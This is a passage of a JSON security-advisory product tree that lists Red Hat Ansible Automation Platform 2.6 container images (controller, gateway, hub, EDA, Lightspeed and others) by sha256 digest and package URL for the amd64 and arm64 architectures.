"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Aea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Aafa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Ad60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Acdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3Ada80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Acc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Acc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Ae777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Aaa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Aa5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Ab6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Ab0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Acc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Ad34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Abe9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
